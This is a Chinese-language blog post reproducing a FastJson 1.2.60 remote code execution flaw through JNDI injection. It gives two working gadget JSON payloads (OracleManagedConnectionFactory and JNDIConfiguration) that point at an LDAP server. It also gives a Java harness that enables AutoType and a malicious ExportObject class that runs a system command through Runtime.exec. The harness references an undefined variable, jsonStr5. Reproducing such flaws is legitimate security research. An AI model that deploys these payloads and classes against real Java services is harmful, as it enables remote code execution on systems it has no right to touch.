LoginSignup
0
0

More than 3 years have passed since last update.

@shimizukawasaki(清水 川崎)

[漏洞复现]FastJson 1.2.60远程代码执行漏洞(From第三方jar包)

Last updated at Posted at 2019-09-19

前言

最近有安全从业者——浅蓝色de忧伤在Freebuf发表了一文「抽象语法树分析寻找FastJSON的Gadgets」.根据他的文章两个FastJson用以JNDI注入的gadget随之公布,但目前FastJson官方并未将这两个gadget打入黑名单.

复现环境准备

  • 1.JDK 8U20
  • 2.所需jar清单如下
fastjson-1.2.60.jar
commons-configuration-1.4.jar
ojdbc14-10.2.0.2.0.jar
javax.resource-api-1.7.1.jar

FastJson复现

FastJsonTest.java

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.parser.ParserConfig;

public class FastJsonTest {
    public static void main(String[] args){

        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);

        String jsonStr1 ="{\"@type\":\"oracle.jdbc.connector.OracleManagedConnectionFactory\",\"xaDataSourceName\":\"ldap://127.0.0.1:1389/ExportObject\"}";

        String jsonStr2 = "{\"@type\":\"org.apache.commons.configuration.JNDIConfiguration\",\"prefix\":\"ldap://127.0.0.1:1389/ExportObject\"}";

        JSONObject json = JSON.parseObject(jsonStr5);
        json.toJSONString();
    }
}

恶意类ExportObject.java

import java.io.BufferedReader;
import java.io.InputStreamReader;

public class ExportObject {
    public ExportObject() throws Exception {
        Process proc = Runtime.getRuntime().exec("open /Applications/Calculator.app");
        BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
        StringBuffer sb = new StringBuffer();

        String line;
        while((line = br.readLine()) != null) {
            sb.append(line).append("\n");
        }

        String result = sb.toString();
        Exception e = new Exception(result);
        throw e;
    }

    public static void main(String[] args) throws Exception {
    }
}

使用oracle.jdbc.connector.OracleManagedConnectionFactory payload 效果如下

oracle.jdbc.connector.OracleManagedConnectionFactory

使用org.apache.commons.configuration.JNDIConfiguration payload 效果如下

org.apache.commons.configuration.JNDIConfiguration

总结

这两个gadget,对于实战来说较为鸡肋.因为对于依赖的jar来说,并不是中间件或者JDK自带的jar,还需要手动开启AutoType.但这种利用AST语法树寻找利用类的方式值得学习.

后记

对于不会开启rmi和ldap服务的同学可以查阅我的文章——《如何快速开启RMI&&LDAP》,快速开启http服务可以使用python -m SimpleHTTPServer.
使用JNDI进行rce,请注意JDK对于JNDI的修复,可参考pyn3rd师傅的图

JDK对于JNDI的修复

鸣谢

pyn3rd

Reference

https://github.com/alibaba/fastjson/issues/2756
https://www.freebuf.com/articles/web/213327.html
https://mp.weixin.qq.com/s/TuQWvyro5vphyeZCAo_Y6g

招聘

亚信安全火爆招人中,请参阅下文(或在本公众号中寻找招聘简章)投递您的简历
https://mp.weixin.qq.com/s/88K0GFPWYXD5MlBioPd5qQ

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
What you can do with signing up
Sign upLogin
0
0